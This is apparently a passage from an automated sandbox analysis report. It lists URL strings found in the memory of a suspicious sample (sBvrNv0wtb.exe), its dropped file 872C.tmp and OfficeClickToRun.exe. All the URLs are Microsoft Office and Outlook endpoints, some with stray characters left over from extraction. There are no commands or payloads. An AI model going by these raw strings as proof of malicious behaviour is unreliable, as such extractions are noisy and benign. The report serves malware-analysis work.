    Source: 872C.tmp, 00000003.00000003.1390200613.0000000003E46000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005525000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389167488.0000000003E63000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1388403613.0000000003E5A000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1390200613.0000000003E59000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1388611638.0000000003E4E000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392103556.00000000056FA000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1388436799.0000000003D1A000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389651071.0000000003E8C000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1950235004.00000248C3189000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C318A000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1678127398.00000248C317E000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2015814653.00000248C31A5000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2014742266.00000248C3179000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2051883076.00000248C31B2000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2013432377.00000248C3169000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentities
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394113903.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395207483.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.0000000005595000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentities43
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005525000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389167488.0000000003E63000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394113903.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1388403613.0000000003E5A000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395207483.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.0000000005595000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1390200613.0000000003E59000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1388611638.0000000003E4E000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392103556.00000000056FA000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1388436799.0000000003D1A000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389651071.0000000003E8C000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1950235004.00000248C3189000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C318A000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1678127398.00000248C317E000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2015814653.00000248C31A5000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2014742266.00000248C3179000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2051883076.00000248C31B2000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2013432377.00000248C3169000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentitiesupdated
    Source: 872C.tmp, 00000003.00000003.1392584595.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393823050.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1429912339.0000000005553000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=falsed
    Source: 872C.tmp, 00000003.00000003.1392584595.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393823050.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1429912339.0000000005553000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=falseil#Hx
    Source: sBvrNv0wtb.exe, 00000000.00000003.1320415962.0000019728184000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000002.00000000.1320044762.000000000142B000.00000002.00000001.01000000.00000005.sdmp, 872C.tmp, 00000003.00000000.1321361371.000000000142B000.00000002.00000001.01000000.00000005.sdmpString found in binary or memory: https://otelrules.svc.static.microsofthttps://otelrules.azureedge.net/rules/excel.exe
    Source: 872C.tmp, 00000003.00000003.1430514920.0000000005603000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005525000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394034884.0000000005621000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1430912671.0000000005617000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393016019.0000000005617000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392840202.000000000560D000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431809017.000000000561D000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392103556.00000000056FA000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392770568.0000000005603000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393510255.000000000561D000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1665092686.00000248C2B67000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2013710001.00000248C2B5B000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://outlook.office.com/
    Source: 872C.tmp, 00000003.00000003.1392584595.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393114083.0000000005589000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1429912339.0000000005553000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://outlook.office.comalBiascW
    Source: 872C.tmp, 00000003.00000003.1392584595.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005525000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393114083.0000000005589000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1390200613.0000000003E59000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392103556.00000000056FA000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392714396.0000000005725000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1429912339.0000000005553000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1665092686.00000248C2B0D000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2054015992.00000248C2D59000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000002.2057344669.00000248C0D3D000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1694509817.00000248C2D3F000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1707272287.00000248C2D28000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1950463823.00000248C2D26000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://outlook.office365.com
    Source: 872C.tmp, 00000003.00000003.1430514920.0000000005603000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005525000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394034884.0000000005621000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1430912671.0000000005617000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393016019.0000000005617000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392840202.000000000560D000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431809017.000000000561D000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392103556.00000000056FA000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392770568.0000000005603000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393510255.000000000561D000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1950235004.00000248C3189000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C318A000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1678127398.00000248C317E000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1665092686.00000248C2B67000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2015814653.00000248C31A5000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2014742266.00000248C3179000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2013710001.00000248C2B5B000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2013432377.00000248C3169000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://outlook.office365.com/
    Source: 872C.tmp, 00000003.00000003.1431577067.0000000003EC8000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395309727.0000000003ECD000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395226390.0000000003EC5000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394605340.0000000003E75000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395078467.0000000003E97000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394341544.0000000003E6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://outlook.office365.com/329
    Source: 872C.tmp, 00000003.00000003.1431577067.0000000003EC8000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395309727.0000000003ECD000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395226390.0000000003EC5000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394605340.0000000003E75000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395078467.0000000003E97000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394341544.0000000003E6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://outlook.office365.com/3297
    Source: 872C.tmp, 00000003.00000003.1431577067.0000000003EC8000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395309727.0000000003ECD000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395226390.0000000003EC5000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394605340.0000000003E75000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395078467.0000000003E97000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394341544.0000000003E6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://outlook.office365.com/329S
    Source: 872C.tmp, 00000003.00000003.1390200613.0000000003E46000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005525000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389167488.0000000003E63000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1390200613.0000000003E59000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1429775033.000000000576E000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392103556.00000000056FA000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392714396.0000000005725000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389651071.0000000003E8C000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2052379122.00000248C2CF4000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2052051790.00000248C2CEB000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1949642856.00000248C2BFF000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
    Source: 872C.tmp, 00000003.00000003.1390200613.0000000003E46000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392584595.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005525000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389167488.0000000003E63000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394034884.0000000005621000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393114083.0000000005589000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393016019.0000000005617000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1390200613.0000000003E59000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392840202.000000000560D000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392103556.00000000056FA000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392770568.0000000005603000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389651071.0000000003E8C000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1429912339.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393510255.000000000561D000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2052379122.00000248C2CF4000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2054015992.00000248C2D59000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2052051790.00000248C2CEB000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000002.2059567438.00000248C2CFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393845975.00000000055B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.jsonD
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393845975.00000000055B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.jsonv2
    Source: 872C.tmp, 00000003.00000003.1390200613.0000000003E46000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005525000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389167488.0000000003E63000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1390200613.0000000003E59000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394605340.0000000003E75000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392103556.00000000056FA000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395078467.0000000003E97000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394341544.0000000003E6E000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389651071.0000000003E8C000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2015929363.00000248C3202000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1950235004.00000248C3189000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C318A000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1678127398.00000248C317E000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2015530791.00000248C31EA000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2014742266.00000248C3179000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2055051473.00000248C3209000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2040649536.00000248C3209000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2013432377.00000248C3169000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://outlook.office365.com/connectors
    Source: 872C.tmp, 00000003.00000003.1394136326.00000000055F3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393845975.00000000055B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://outlook.office365.com/connectorsUX494
    Source: 872C.tmp, 00000003.00000003.1394136326.00000000055F3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393845975.00000000055B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://outlook.office365.com/connectorsnit3P--
    Source: 872C.tmp, 00000003.00000003.1394136326.00000000055F3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393845975.00000000055B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://outlook.office365.com/ews/exchange.asmx
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394113903.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395207483.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.0000000005595000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pagecontentsync.onenote.com/pagecontentsync/attachment/v1nc/attachment/v1Fix
    Source: 872C.tmp, 00000003.00000003.1390200613.0000000003E46000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005525000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1390200613.0000000003E59000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392103556.00000000056FA000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
    Source: 872C.tmp, 00000003.00000003.1394736534.0000000003F77000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394452880.0000000003F70000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394302183.0000000003F58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook3
    Source: 872C.tmp, 00000003.00000003.1390200613.0000000003E46000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005525000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1390200613.0000000003E59000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392103556.00000000056FA000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2015929363.00000248C3202000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1950235004.00000248C3189000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C318A000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1678127398.00000248C317E000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2015530791.00000248C31EA000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2014742266.00000248C3179000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2055051473.00000248C3209000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2040649536.00000248C3209000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2013432377.00000248C3169000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pages.store.office.com/review/query
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005525000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389167488.0000000003E63000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394113903.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1388403613.0000000003E5A000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395207483.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.0000000005595000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1390200613.0000000003E59000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392103556.00000000056FA000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389651071.0000000003E8C000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2052051790.00000248C2CEB000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000002.2059428637.00000248C2CEF000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1949642856.00000248C2BFF000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.jsonMBI_SSLpeople.directory.
    Source: 872C.tmp, 00000003.00000003.1430514920.0000000005603000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1430912671.0000000005617000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393016019.0000000005617000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392840202.000000000560D000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431809017.000000000561D000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392770568.0000000005603000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393510255.000000000561D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.jsonathWiO
